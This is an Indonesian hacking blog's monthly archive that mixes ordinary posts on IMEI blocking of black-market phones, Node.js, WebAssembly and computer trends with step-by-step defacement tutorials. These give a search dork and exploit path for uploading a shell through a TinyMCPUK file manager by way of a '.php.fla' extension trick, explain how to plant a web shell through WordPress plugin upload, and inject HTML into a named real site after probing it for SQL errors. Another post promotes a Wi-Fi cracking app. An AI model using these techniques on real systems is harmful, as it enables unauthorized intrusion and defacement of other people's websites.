September 2019 - Om Heker

Sunday, September 29, 2019

Langkah ketika Ponsel di Blokir kemenperin imei


Halo sobat om heker kali ini omheker akan menjelaskan sedikit tentang Langkah ketika Ponsel di Blokir kemenperin imei,
Kemenperin menyatakan akan dilakukan pemblokiran bekerjasama dengan operator mulai dari tanggal 17 Agustus 2019. Artinya jika anda pemakai ponsel bm, maka anda tidak bisa memakai ponsel seperti biasanya. Tidak akan ada akses komunikasi (baca : telepon, sms, internet) di ponsel anda.
Untuk ponsel bm yang sudah aktif digunakan sebelum tanggal 17 Agustus, regulasinya sedang disiapkan. Belum tahu akan seperti apa nasibnya. Apakah langsung diblokir aksesnya atau ada kebijakan lain.Tentu saja ponsel bm yang dibeli dan dicoba setelah tanggal 17 Agustus, maka akan otomatis terblokir.
Oh ya ada catatan bahwa pemblokiran terjadi berdasarkan IMEI dari ponsel. Jika IMEI sudah terdaftar di database Kemenperin, anda selamat. Seharusnya ponsel-ponsel resmi yang dijual di Indonesia, IMEI-nya sudah terdaftar di Kemenperin
Rencananya 3 kementerian akan membuat regulasi terkait hal ini, dengan masing-masing kementrian (Kementerian Informasi dan Komunikasi, Kementerian Perindustrian, dan Kementerian Perdagangan) membuat peraturan (Undang-Undang) yang mendukung satu sama lain untuk memerangi Ponsel BM. Rencananya 3 Kementrian akan menandatangani Peraturan tersebut secara bersamaan pada 17 Agustus 2019 yang akan kemudian segera diterapkan. Namun tampaknya penandatangan tersebut diundur karena beberapa alasan. Saya tau yang ingin Quoran ketahui adalah apakah setelah peraturan ditanda tangani akan langsung terblokir? (Mengingat banyak pengguna ponsel BM XD) jawabannya adalah tidak! Karena akan diterapkan secara bertahap, dan ponsel BM yang dibeli sebelum peraturan ditandatangani akan mendapat masa pemutihan beberapa tahun.

Berikut Ciri Ciri Ponsel BM (Ilegal)

  1. Dijual Batangan
  1. Biasanya ada stiker kecil yang ditempelkan entah dibawah ataupun dibelakang bodi smartphone
  1. Jika suatu brand tak membawa produk itu ke Indonesia namun ada yang menjualnya itu dipastikan adalah barang BM
  1. Umumnya barang BM yang tidak batangan (Baru; BNIB) ada distributor non resmi yang membawanya & dikotak penjualan biasanya terdapat stiker si distributor
  1. IMEI tak terdaftar di kemenperin (cara cek IMEI ketik *#06#)
Sebagai konsumen ya hati-hati aja kalo mau beli smartphone. Jangan karena murah ~200 ribu dapet smartphone baru dicoba eh nggak dapet sinyal. Ternyata dicek, IMEI tidak terdapat di database kementerian komunikasi. Jadilah smartphone pengganjal pintu.
Produk produk handphone yang dijual secara black market atau handphone ilegal IMEI (International Mobile Equipment Identity) ini bakal di blokir per agustus tahun ini, bertujuan untuk mengatasi ekosistem penjualan handphone di tanah air, apakah hal ini sebagai alasan yang mendasar sebagai bentuk untuk mencegah penjualan handphone ilegal atau black market di indonesia, dikarenakan ada banyak pengusaha pengusaha yang dirugikan dengan masuknya handphone ilegal, jadi pemerintah tengah mengembangkan peraturan ini agar tidak ada pihak pihak yang di rugikan kedepannya nanti.
Apa Yang di Blokir?
Aturan informasi Handphone IMEI ilegal bakal di blokir akan terealisasi karena isu ini sudah lama di sejak beberapa tahun lalu, pemblokiran handphone IMEI ilegal sebatas jaringan, jadi bukan serta merta handphone tidak bisa digunakan sama sekali hanya saja pembatasan jaringan yang tidak dapat digunakan. Berkaitan dengan pemblokiran biasanya keterkaitan dengan jaringan telpon, dengan di blokirnya jaringan maka tidak dapat digunakan untuk melakukan panggilan ataupun menggunakan paket data internet. Selanjutnya bagaimana dengan handphone yang IMEI nya ilegal sebelum putusan ini keluar?
Jadi seandainya handphone saya black market, dan tidak bisa digunakan untuk menelepon/SMS dan menggunakan paket data internet setelah Agustus 2019 nanti, jalan satu-satunya adalah mengganti dengan handphone baru.

Deface Tinymcpuk Mediatech

IMG_20180709_174913

Halo guys kali ini saya akan memberi tutorial bagaimana cara deface dengan metode Tinymcpuk Mediatech, mari simak tutorial berikut ini.

1.) Dorking ( Dork : All rights reserved. © 2015 Media Tech Indonesia )

2.) Pilih lah salah satu situs

3.) Pasangkanlah exploit berikut ini pada ujung url.
/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
Contohnya :
target.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
4.) Ubahlah extensi shell kalian atau script deface kalian menjadi .php.fla atau .htm.fla, lalu upload lah pada form upload yang tersedia.

Tempat akses shell atau script deface kalian adalah :
 /tinymcpuk/gambar/Flash/shell.php.fla
Sekian tutorial kali ini sampai jumpa di tutorial menarik lainnya.

Cara upload Shell Di CMS Wordpress terbaru

download%2B%25282%2529-picsay


Halo guys kali ini om heker akan memberi tutorial cara upload shell di CMS Wordpress terbaru. Mungkin beberapa dari kalian kebingungan kan saat akan mengupload shell pada CMS Wordpress nah untuk itu mari simak tutorial berikut ini.

1.) Pertama silahkan login terlebih dahulu pada halaman login target.
Screenshot_20180630-065559-picsay
2.) Kedua setelah kalian login dan masuk    pada halaman dashboard klik lah garis tiga seperti gambar dibawah ini.
Screenshot_20180630-065652-picsay
3.) Ketiga pilih lah plugins lalu pilih add new.
Screenshot_20180630-065702-picsay
4.) Keempat Klik Upload Plugins lalu            silahkan upload lah shell kalian pada form upload yang tersedia.
Screenshot_20180630-065717-picsay
5.) Kelima , setelah terupload silahkan                lakukan cara yang pertama lalu pilih              media lalu pilih library.
Screenshot_20180630-065752-picsay
6.) Keenam, silahkan klik shell yang kalian sudah upload tadi lalu pergi lah ke url yang ada untuk mengakses shell kalian.
Screenshot_20180630-065802-picsay
Screenshot_20180630-065813-picsay
Nah mudah bukan?. Sekian tutorial kali ini sampai jumpa di tutorial menarik lainnya.

Tutorial Deface Metode XSS



Halo sobat om heker kali ini om heker akan menjelaskan sedikit tutorial Deface Metode XSS upload Shell atau disebut juga Cross Site Scripting Attack adalah metode dimana client memasukan script HTML kedalam sebuah website.

oke Berikut penjelasannya dari tutorial Deface Metode XSS :

1.) Dorking, Dork :
inurl:news.php?id= ( kembangkan )


2.) Pilih lah salah satu situs atau website.


Screenshot_20180615-154848-picsay
Contohnya saya menggunakan situs :
http://www.jmtv.com/news.php?id=3

3.)  Cobalah masukan ' dibelakang url contohnya :
http://www.jmtv.com/news.php?id=3'

Jika blank ataupun muncul sql bla bla berarti vuln contohnya situs yang saya gunakan ini muncul :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
4.) Selanjutnya coba masukan script HTML dibelakang url contohnya :
http://www.jmtv.com/news.php?id=3%27<h1>Hacked By MastahCyber</h1>
Tips! : Kalian juga bisa mengubahnya dengan script HTML lainnya.

Nah setelah seperti itu akan muncul seperti gambar dibawah ini berarti kita berhasil mendeface situs tersebut dengan metode xss ini.
Screenshot_20180615-160038
Gunakanlah dengan bijak jangan sampai merugikan orang lain.

Sekian tutorial tentang Deface Metode XSS sampai jumpa di tutorial menarik lainnya.

Friday, September 27, 2019

Kelebihan Node js dibanding PHP


Tidak ada bahasa pemrograman yang buruk. Semua ada kelebihan dan kekurangan, serta area penerapan spesifik masing-masing yang biasanya berangkat dari mengapa bahasa pemrograman tersebut dibuat.
JavaScript diciptakan untuk digunakan pada browser yang dengan demikian menjadikannya sebagai ‘the language of the web- awal yang bersahaja dengan kemampuan sangat terbatas hanya dapat digunakan pada web browser menyebabkan - mungkin tidak sampai lima tahun yang lalu - JavaScript selalu dianggap remeh dan tidak ada yang mau mempelajari. Ini berubah drastis sejak hadirnya NodeJS.
Uniknya, NodeJS itu sendiri tidak dikembangkan dalam bahasa pemrograman JavaScript, melainkan C/C++ dan menggunakan JavaScript execution engine V8 dari google.
Perusahaan-perusahaan disebutkan di atas, menjalankan aplikasi berbasis web sebagai media utama dalam memberikan layanan kepada para pelanggan mereka sehingga sudah pasti, JavaScript adalah pilihan terbaik. Dan sejak nodeJS yang memungkinkan JavaScript berjalan pada server - JavaScript pun lalu berkemampuan untuk men-generate konten-konten dynamic yang diperlukan dalam suatu aplikasi. Dengan demikian, kita tidak lagi harus mengelola dua bahasa berbeda untuk masing-masing ‘frontend & backend’ di dalam satu codebase.
Peningkatan dalam hal performance pun dirasakan berkat arsitektur NodeJS yang berbeda dengan teknologi server lain yang berbasis PHP, Java, Ruby atau ASP. Kesemuanya menerapkan pattern Multi-Thread di dalam penanganan request, yang mana setiap request akan memicu thread atau bahkan proses yang baru.
Pada NodeJS dan tentu saja semua aplikasi yang dikembangkan di dalam lingkungan NodeJS menerapkan arsitektur Single Threaded, Non Blocking I/O [1]di dalam penanganan requests, yang mana semua requests, termasuk juga sharing resources, berada dalam satu thread.
Sementara non blocking disini maksudnya tidak menunggu. Jadi penanganan request-request terjadi secara tidak berurutan, dan penanganan satu request tidak akan menunggu suatu penanganan request yang lain selesai. Mengapa? Ya karena begitulah sifat JavaScript - asynchronous - dimana eksekusi suatu fungsi tidak menunggu eksekusi fungsi yang lain selesai. Dan sebenarnya kita pun tidak akan pernah tahu fungsi yang mana yang akan dijalankan lebih dulu oleh JavaScript. Inilah yang menyebabkan aplikasi-aplikasi NodeJS sangat cepat.
Jadi kesimpulannya - apakah JavaScript itu buruk? :D Kembali lagi, tidak ada bahasa pemrograman yang buruk.
Yang biasanya berpendapat demikian adalah developer dari bahasa lain yang berpengalaman atau mungkin (merasa) ahli - sehingga tidak cukup open-minded untuk menerima bahwa cara kerja JavaScript itu berbeda dengan semua ilmu yang mereka miliki dalam pemrograman. Dan bukannya menerima kenyataan juga bahwa ternyata masih ada ilmu-ilmu lain yang belum mereka pahami di mana mereka masih perlu belajar, mereka malah langsung menarik kesimpulan,
“Wah kok begini (tidak seperti yang saya tahu) ? Oh, ternyata JavaScript itu gak bagus (karena tidak sesuai dengan yang saya pahami dari bahasa pemrograman yang lain)”


Node.js bisa jadi lebih menarik karena menawarkan performa yang sangat cepat jika dibandingkan PHP. Disamping itu, ketersediaan library yang berlimpah tentunya akan sangat membantu mempercepat pengembangan aplikasi.
Namun, tentunya kembali pada proyeksi di awal, seberapa lama estimasi Backend itu akan bertahan digunakan, seberapa jauh skalabilitas yang ingin dicapai dari Backend tersebut.
Jika tujuan penggunaan nya adalah jangka panjang, dan tuntunan skalabilitas nya tinggi, maka bukan Node.js maupun PHP yang disarankan, melainkan JAVA. Untuk penggunaan lingkup enterprise, tidak ada kompromi untuk tidak memanfaatkan Java. 

Apakah Node.js cocok dipelajari oleh pemula?


Hello sobat om heker kali ini om heker akan menjelaskan  sedikit tentang Apakah Node.js cocok dipelajari oleh pemula? sebelum saya lanjut menjelaskan, bagi kalian yang belum tau pengertian node js bisa di clik disini  penjelasan singkat dari apa itu node.js 

oke kita lanjut, Menurut gw Node.js ngga cocok buat programmer pemula.
Kalo buat pemula, mungkin main - main aja dulu sama python atau ruby, mungkin lebih fun disana. karena:
  • Codenya masih cenderung bisa dibaca dari atas kebawah.
  • Bahasanya ngga beda jauh sama bahasa Inggris.
  • Sangat interactive dengan fitur REPL-nya (Read-Eval-Print-Loop).
    Jadi kamu bisa coba code baris per baris dan lihat effectnya secara langsung tanpa harus dicompile dulu.
  • Typingnya dynamic, jadi ada banyak salah gapapa, masih bisa jalan, walaupun kalau dinilai, programmu mungkin cuman dapet score 10 ~ 20%, tapi paling ngga kamu merasakan ada feedbacknya, kamu ada progress dari 0 ke 10%, ke 20%, ke 25% dst.
    Sementara, di bahasa - bahasa lain yang type-nya static seperti Java, mungkin istilahnya program yang nilainya dibawah 80%, itu ditolak, dan ga bisa jalan sama sekali. Bahasa yang kayak gini cocok buat programmer yang emang udah butuh program yang lebih reliable.
    Tapi kalau dikasih ke pemula, bisa jadi dia terus - terusan melihat nilainya tetap 0, dan justru mendiscourage dia mendalami pemrograman…
    (Javascript sendiri sebenarnya termasuk golongan dynamic, tapi disini yang dibahas kenapa python / ruby cocok buat pemula)
Tingkat kesulitannya Node.js, memang tidak sesusah C atau C++ yang harus disiplin banget buat ngefree memory setelah dipakai secara manual, atau pointer arithmetic yang pain in the ass…
Tapi… async-await, promise, event-loop, callback-hell dkk, mungkin merupakan konsep yang terlalu rumit, yang bisa bikin kamu stuck terus disitu kalau kamu masih baru pertama kali kenal programming.
Menurut gw, Node.js lebih "fun", buat orang yang udah nyemplung cukup dalam ke programming, udah tau basic - basicnya, dan pernah bermain - main dengan function sebagai "first-class citizen".
Selain itu, Node.js (javascript) juga dikenal sebagai bahasa yang punya banyak quirks - quirks yang aneh akibat type-coercionnya, salah satunya yang paling populer adalah:
  1. [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
yang kalau dijalankan dibrowser akan menjalankan:
  1. alert(1)
Kenapa bisa gitu? lengkapnya bisa dibaca di: Write any JavaScript with 6 Characters: []()!+
Sekarang balik ke pertanyaan yang pertama, apa kemudahan yang ditawarkan oleh Node.js
Jawabannya justru adalah apa yang mendiscourage programmer pemula tadi:
Asynchronous-function, promise, event-loop. callback, dan model event-driven-programming-nya.
Jadi gini, at some point di karirmu sebagai programmer, kamu mulai peduli, gimana caranya agar programmu lebih responsive, lebih hemat resource, dan lain - lain.
nah, dibahasa - bahasa lain yang masih blocking dan single-threaded itu, analoginya sering kali terjadi masalah seperti ini:
  • Kamu ngasih tugas ke temenmu.
  • Tapi kamu ngga tau temenmu butuh waktu berapa lamu ngerjainnya.
  • Jadi kamu tungguin itu temenmu sampe tugasnya selesai.
  • Setelah tugasnya selesai baru kamu bisa lanjut ngerjain apapun yang mau kamu lakukan.
bisa dibayangkan apa yang terjadi kalo temenmu lama banget ngerjainnya, dan kamu sendiripun punya banyak tugas - tugas lain, berapa lama waktu yang terbuang.
Sementara itu, di Node.js, yang dilakukan adalah:
  • Kamu kasih tugas ke temenmu.
  • Kamu titip pesan lagi ketemenmu, apa yang harus dia lakukan kalo tugasnya udah selesai. (misal: ngasih tau kamu, kalo tugasnya udah selesai, dan sudah bisa diambil).
  • Kamu tinggalin temenmu ngerjain tugasnya itu. dan kamu ngerjain tugasmu yang lain apapun itu.
  • Setelah temenmu selesai ngerjain, dia cuman bakalan ngasih tau kamu (misal kirim SMS). Terus ya udah, dia bisa main PS, tidur, atau ngapain terserah, mati juga gapapa, asal tugasnya ditaro ditempat yang gampang diambil.
  • Mungkin kamu masih ada kerjaan waktu dapet SMS itu, jadi ngga bisa langsung diambil, tapi ngga papa, kamu lanjutin ngerjain tugasmu yang harus dikerjakan berurutan itu, kalo udah abis, baru kamu ambil tugas yang dikerjain temenmu itu.
Jadi disini istilahnya Node.js itu bukan seorang genius yang bisa arithmetic cepet (C++), tapi tujuannya adalah membuat tugas - tugas itu, bisa dikerjakan tanpa blocking.
Ada satu hal lagi yang gw suka dari Node.js.
Yaitu ketika dikombinasikan dengan typescript.
Kalau diatas tadi gw bilang bahwa Javascript termasuk golongan dynamic yang mudah release, tapi kurang pengawasan, seperti ruby dan python.
Nah, typescript ini seperti guru yang mengkoreksi keteledoran - keteledoran kita, karena, kalau ketahuan ada yang tidak benar, belum dikumpulin pun sudah langsung dimarahin.
Tapi dengan itu, justru ketika, bu guru sudah bilang OK, berarti program kita, sudah lolos verifikasi tahap-1…
Masih mungkin ada kesalahan logika, tapi tidak ada kesalahan type seperti menjumlahkan angka dengan huruf, null pointer exception, dsb.
Apabila kamu disiplin mengikuti best-practice dari typescript, kamu pun dapat membantu sang guru, agar dia lebih mudah dalam mengkoreksi programmu.

Apa itu node.js ?


Helo sobat omheker, kali ini omheker akan menjelaskan sedikit tentang Apa itu node.js

node.js adalah sebuah platform yang dibuat di atas JavaScript Runtime-nya Chrome“. Dengan kata lain, kodingan yang kamu tulis untuk server akan dieksekusi dengan cara yang mirip dengan ketika di browser.

Sehingga kalian dengan mudah membawa teknik-teknik JavaScript yang telah kalian pelajari ke node.js. node.js itu sangat cepat, event-driven, dan ringan tetapi manfaat paling besar dari menggunakan node.js ini adalah pemrograman asynchronous.

Mari kita pahami terlebih dahulu tentang perbedaan dari pemrograman asynchronous dengan synchronous dalam penjelasan yang sederhana yang akan memberikan kita pemahaman tentang bagaimana node.js bekerja di balik layar dan alasan dibalik popularitasnya.

Berikut beberapa aplikasi Perusahaan Besar yang dibuat dengan Node.js yang terkenal untuk skala dan performa yang tak masuk akal.
Walmart berganti menggunakan Node.js saat Black Friday, dan mendapatkan 200 Juta pengunjung tiap hari dan tidak pernah dibawah 1% CPU.
LinkedIn menulis ulang mobile backend di Node.js dan memproses 20 kali performa lebih cepat dari 1/10 server.
Groupon meningkatkan kecepatan menunggu halaman 50% dengan mengganti dari yang semula Ruby on rails ke Node.js. Mereka juga melaporkan untuk meluncurkan fitur baru lebih cepat dari sebelumnya.
Paypal membuat eksperimeen dengan dua tim membuat perangkat lunak identical - satu di Java dan satu di Node.js Node Js team dapat membuat dalam setengah waktu. Node.js app memiliki respon time 50% lebih cepat dari Java app
Kamu sendiri dapat membaca mengenai performa yang luar biasa(dan produktifiti pengembang )disini
Anehdot tersebut hanya sedikit dari permukaan. Banyak perusahaan perusahaan Besar -seperti Netflix dan Uber- yang sekarang dibuat menggunakan Node.js
Node.js yang berbasis Javascript sangat cepat dan bahkan ringan saat menjalankannya, berbeda dengan PHP yang agak lambat.
Bahkan sampai sekarang saya terus menggunakan berbagai framework Node.js seperti http://fastifiy.io . Saya juga pernah mencoba KOA, dan untuk Web Devnya saya menggunakan Adonis JS. Adonis keren banget, mirip Laravelnya PHP! Meskipun belum se-sempurna Laravel tapi udah keren banget lah.

10 Alasan mengapa komputer terus berkembang



Halo sobat om heker, kali ini omheker akan menjelaskan 10 Alasan mengapa komputer terus berkembang, mau tau apa alasannya? yuk kita simak baik baik penjelasan dibawah ini.

Pada era jaman sekarang, teknologi memang sangat berkembang bahkan berkembang sangat cepat. Teknologi dari berbagai bidang semakin modern dari masa ke masa. Teknologi pangan, industri, otomotif, kuliner, transportasi, dan yang sedang hangat dibicarakan adalah perkembangan teknologi komputer yang berkembang pesat.

Komputer hampir menjadi makanan sehari-hari bagi beberapa orang. Teknologi komputer memang yang paling banyak dibicarakan oleh masyarakat umum, karena komputer bisa dibilang mencakup hampir semua bidang. Bidang pangan, kita bisa menggunakan komputer, termasuk otomotif, transportasi, hampir semua berkaitan dengan komputer.

Fungsi teknologi dan informasi dan komunikasi saat ini cukup menjadi penting bagi hampir seluruh orang. Karena dengan menggunakan teknologi yang berkembang pesat saat ini berkomunikasi dengan semua orang di dunia menjadi lebih mudah. Hal ini juga melandasi perkembangan jaringan komputer yang juga semakin meluas. Ini menandakan manfaat jaringan komputer semakin banyak digunakan setiap orang, tidak hanya untuk berkomunikasi namun juga mengakses informasi penting lainnya.

Teknologi Komputer

Mulai dari pengertian teknologi komputer itu dulu. Apa sih teknologi komputer itu? Teknologi komputer adalah teknologi yang sangat berperan penting membantu pekerjaan manusia yang begelut dalam dunia komputer. Jadi maksudnya adalah, teknologi yang bisa membantu pekerjaan manusia melalui komputer. (baca juga: pengertian teknologi menurut para ahli)


Komputer memang akan selalu berkembang dari waktu ke waktu karena tuntutan masyarakat yang semakin banyak. Masyarakat pada jaman now memiliki pekerjaan yang semakin kompleks yang tidak bisa lepas dari teknologi komputer itu sendiri.

Faktor – Faktor Teknologi Berkembang Pesat
Ada banyak faktor yang mempengaruhi perkembangan teknologi komputer pada jaman sekarang. Faktor ini tak lepas dari kebutuhan masyrakat yang semakin kompleks dari waktu ke waktu.

1. Kebutuhan Waktu


Faktor ini mungkin menjadi faktor yang paling penting. Karena masyarakat pada jaman sekarang menginginkan segalanya serba cepat bahkan instan.


Contoh : Orang ingin membeli suatu barang, dengan adanya teknologi, maka barang yang diinginkan akan cepat tersampaikan.

2. Kebutuhan Fasilitas yang Canggih


Fasilitas yang canggih memang diperlukan pada jaman sekarang. Fasilitas yang canggih diharapkan masyarakat dapat membantu pekerjaannya supaya lebih cepat. Tuntutan aktivitas pada jaman sekarang memang membutuhkan fasilitas yang canggih. Ini bisa didapatkan dan dirasakan dari adanya manfaat mempelajari ilmu komputer untuk menunjang kemampuan dalam dunia kerja.

Contoh : Jaman sekarang pekerjaan orang semakin banyak, sehingga dalam mengerjakan tugasnya diharapkan dapat dikerjakan di berbagai tempat. Dalam mengerjakan tugasnya bisa menggunakan android yang bisa dibawa kemanapun.

3. Kebutuhan Karena Usaha atau Bisnis



Dalam jaman sekarang, teknologi membantu dalam perkembangan usaha atau bisnis. Teknologi komputer dapat membantu pemasaran, produksi, distribusi suatu usaha atau bisnis. Selain itu teknologi komputer juga bisa mempermudah komunikasi antara pihak usaha dengan pihak konsumen. Seperti pada bidang usaha keuangan, manfaat internet bagi perbankan sangat membantu pada nasabah dalam melakukan transaksi yang dapat dilakukan dimanapun.

Contoh : Usahawan dapat membuat aplikasi untuk mempermudah konsumennya belanja tanpa harus datang ke tokonya langsung. Dalam artian peranan teknologi termasuk dalam website e-commerce yang sangat memudahkan customer berbelanja secara online dirumah. 

4. Kebutuhan akan Tingginya Permintaan dan Penawaran


Hal ini mungkin hampir sama dengan nomor tiga, namun sedikit berbeda. Permintaan akan penawaran pada jaman sekarang sudah sangat besar. Hampir setiap hari bahkan jam, ada permintaan dan juga penawaran. Dengan teknologi, kita dapat melakukan permintaan dengan mudah tanpa harus datang ke lokasi langsung, dan untuk penawaran, kita juga bisa menawarkan barang atau jasa langsung lewat internet tanpa harus menemui konsumen

Contoh : Iklan di internet dalam menawarkan barang atau jasa. Para konsumen dapat memanfaatkan internet untuk meminta penawaran tersebut.


5. Kebutuhan akan Hobi


Hobi adalah hal yang paling penting bagi setiap orang, contohnya Gamers. Para gamers yang sangat suka dengan game pastinya akan selalu update dengan teknologi game yang lebih canggih. Maka dari itu perusahaan industri game atau komponen game bersaing supaya produknya diminati oleh para kalangan gamers.

Contoh : Persaingan antara kedua brand Grafik NVidia dengan AMD dalam mengeluarkan produk VGA untuk game yang lebih canggih. dan VGA ini akan selalu update setiap bulan.

6. Kebutuhan akan Informasi


Masyarakat pada jaman sekarang tidak terlalu memerlukan koran atau majalah lagi, karena pada jaman sekarang sudah serba digital. Koran bisa diakses langsung diinternet secara gratis, untuk membaca novel, kita bisa beli lewat internet, termasuk majalah, juga gratis. Masyarakat bisa mendapatkan informasi dimana saja.

Contoh : Untuk mengetahui berita – berita terkini, tidak perlu membeli koran terlebih dahulu, melainkan bisa menggunakan internet dan mengakses koran digital.

7. Kebutuhan Ilmu


Untuk jaman sekarang, ilmu bisa didapat dimana saja termasuk dari internet. Dengan teknologi komputer yang berkembang, banyak buku-buku pelajaran bagi siswa atau pelajar yang dapat dilihat secara online. Selain itu, pelajar jaman sekarang sudah mulai dibiasakan menggunakan sistem online dalam pembelajarannya. Dengan adanya teknologi yang mendukung, peran internet terhadap prestasi belajar siswa juga dapat menjadi salah satu alasannya. Karena informasi yang sangat luas pelajar bisa mengakses pelajaran secara online juga.

Contoh : e-book pelajaran bagi para pelajar dapat mempermudah pelajar dalam belajar, tanpa harus membeli buku.

8. Kebutuhan akan Dunia Hiburan


Untuk faktor yang satu ini memang cukup banyak pengaruhnya bagi masyarakat, terutama bagi para remaja. Dengan teknologi yang berkembang, kita bisa memesan tiket bioskop secara online. Selain itu, sekarang sudah banyak game-game online yang bisa dimainkan gratis maupun berbayar.

Contoh : Game android makin marak karena kebutuhan akan hiburan yang semakin banyak di kalangan masyarakat.

9. Kebutuhan akan Industri Musik


Musik mengalami perkembangan mengikuti dengan perkembangan teknologi komputer juga. Untuk rekaman atau recording, pasti membutuhkan komputer, entah proses editing atau yang lainnya. Selain itu dengan adanya teknologi yang makin maju, mendorong perkembangan musik yang lebih maju lagi

Contoh : pada jaman dahulu, musik yang dikenal adalah musik klasik, pada jaman sekarang karena adanya teknologi mampu membuat musik tanpa instrumen musik itu sendiri atau electronic, yaitu genre yang menggunakan komputer dalam membuat nadanya.

10. Kebutuhan akan Komunikasi


Komunikasi adalah hal yang sangat penting bagi semua masyarakat. Sekarang, untuk berkomunikasi tidak perlu harus bertatap muka langsung. Kita bisa berkomunikasi dengan siapapun dan dimanapun tanpa bertatap muka, bahkan juga bisa bertatap muka walaupun dengan jarak yang jauh (video call). Selain itu juga muncul chat jarak jauh yang mempermudah komunikasi.

Thursday, September 26, 2019

Kelebihan webassembly dibanding javascript

Jauh lebih cepat.... seperti, hampir 20% lebih cepat?
OMG, Kamu tidak akan bisa percaya ini! Kalau aku menggunakan WebAssembly, aku mungkin dapat melihat respons dengan kecepatan 8ms daripada 10ms!
Sesuatu yang orang benar-benar tidak memahami seberapa banyak waktu untuk menunggu halaman web, tidak ada hubungannya dengan kecepatan Javascript . Ada latensi server, desain halaman buruk yang berhubungan dengan meminimalkan permintaan jaringan, dan waktu rendering DOM. JavaScript jarang menjadi penghambat. Contohlainnya, mungkin sebuah halaman dirender dalam 899 ms, bukannya 900 ms. Dengan banyak tenaga untuk porting kode ke C ++,sebenarnya lebih baik untuk optimasi halaman dimana hal tersebut sangat membantu.
Ada beberapa kasus penggunaan di mana WebAssembly bisa lebih cepat. Contohnya untuk gim, yang seringkali sudah ditulis dalam C ++. Tetapi sebagian besar, WebAssembly hanyalah "Kamu dapat mengkompilasi C ++ untuk digunakan ke dalam halaman web."
Dan tahukan anda ? saya telah membuat GUI (Graphical User Interfaces, misal nya  Seperti  pada halaman web) di C ++, dan mengembangkan GUI di C ++itu menyebalkan. Bukan berarti HTML + CSS + JavaScript sempurna, namun jauh lebih baik. Dan jauh lebih fleksibel. Serta jauh lebih mudah untuk di-pencarian kutu(debug). lebih banyak pula komponen yang digerakkan. Dan ekosistem terbesar yang pernah ada untuk bahasa apa pun di dalam sejarah.
Orang lain telah mengatakan kita belum dapat memanipulasi DOM dari WebAssembly, tetapi beberapa stack sudah ada yang menangani hal tersebut. Dan ada lebih dari seratus bahasa yang dikompilasi ke JavaScript, jadi jika JavaScript adalah bahasa yang mengerikan, tidakkah kita akan melihat kebangkitan salah satu bahasa dengan prinsip teknik modern yang solid( solid modern engineering principles)? Oh ya, kita adalah: TypeScript.
Sepertiyang aku sebutkan diatas, sebagian besar situs web lambat bukan karena JavaScript. Jadi, bahkan jika kamu bisa memanipulasi DOM dari WebAssembly secara langsung, dan porting kode ke C ++, kamu akan kesulitan untuk melihat perbedaan dalam kecepatan. Selain masalah DOM dan jaringan, mungkin masalah paling umum berikutnya adalah algoritma yang digunakan. Membuat kode Anda 10x lebih cepat dengan mengonversi dari JavaScript ke C ++ itu bagus, tetapi membuatnya 100x lebih cepat hanya dengan mengubah algoritme dalam JavaScript, sedikit banyak berjalan untuk hasil yang lebih baik.
Jadi apa alasan sebenarnya kita masih menggunakan JavaScript dan menyusun ke JavaScript seperti TypeScript? Lebih mudah digunakan, lebih powerful, cukup cepat, dan ekosistem tak tertandingi. Kecuali untuk game dan memiliki pustaka yang khusus, saya tidak melihat WebAssembly membuat perbedaan di masa mendatang.

Wifi Hacker ULTIMATE Wifi hacker apk no root


Halo sobat omheker, kali ini omheker akan menjelaskan tentang Wifi Hacker ULTIMATE aplikasi Wifi hacker apk no root . salah satu aplikasi hacker  yang sering digunakan oleh hacker wifi profesional, yuk kita simak dulu penjelasan dibawah ini
Wifi Hacker ULTIMATE adalah sebuah aplikasi Berbayar dan ada juga yang gratisan, tujuannya untuk mengetes keamanan jaringan wifi atau untuk mengembalikan kata kunci dalam hitungan detik. Ini, sulit untuk di katakan, harus di gunakan pada jaringan anda sendiri, karena membajak wifi orang lain adalah perbuatan buruk.
Untuk menggunakan aplikasi ini, anda hanya butuh untuk memulainya dan tunggu sampai piranti tersebut menemukan semua jaringan yang tersedia pada area anda, walaupun kadang - kadang hal ini bisa memakan waktu yang sangat lama tergantung dari pada jumlah jaringan pemancar di dekat anda.

